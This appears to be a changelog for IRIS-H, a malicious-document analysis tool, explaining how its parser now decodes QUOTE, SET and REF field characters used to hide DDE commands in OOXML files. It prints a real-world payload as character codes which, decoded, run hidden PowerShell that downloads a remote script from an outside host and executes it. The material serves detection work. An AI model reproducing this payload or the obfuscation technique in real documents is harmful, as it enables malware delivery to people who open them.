IRIS-H (alpha): Updated Field Characters Parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature improvement
Affected Components: API
Short Description: Parser for Field Characters used in OLE and OOXML documents has been updated to improve detection. QUOTE, SET, REF field characters have been added to the reporting.
Outstanding Tasks: None

Detailed Summary

Field Character extraction and parsing code has been improved to allow for decoding QUOTE command arguments. The change was motivated by McAfee's blog post today referencing OOXML document used in an APT type of attack. Document's XML code snippet below show an example of what field characters are used and how they are present in the code.

QUOTE field character usage example

DDE field character and the way its arguments are assembled

Unlike previous instances of DDE and DDEAUTO field character usage in malicious documents, this document doesn't expose the command arguments that normally contain indicators of compromise. Instead, a combination of other field characters is used to store and assemble the command arguments.

SET command is used to store the value produced by QUOTE command and later passed to DDE command through REF field character. Below is an example of that:

SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35

 'c' variable now holds the output (character string built from the array of character codes) from QUOTE command. Later 'c' is referenced in DDE command call as one of the arguments.

DDE REF c

When DDE command is called, the value of 'c' variable will be used  as its argument.

IRIS-H field character handlers have been updated to be able to extract the character codes array associated with QUOTE command and decode it. If extraction and decoding is successful the report page will contain the output similar to the one below.

Example of QUOTE command evaluation

This method of using field characters presents new challenges, especially around reconstructing the original text in the same sequence as it appears in the document when it's opened with its corresponding host application. IRIS-H will still attempt to extract all the text fields, but the original text appearance sequence cannot be guarantied.

Full report can be found here - https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a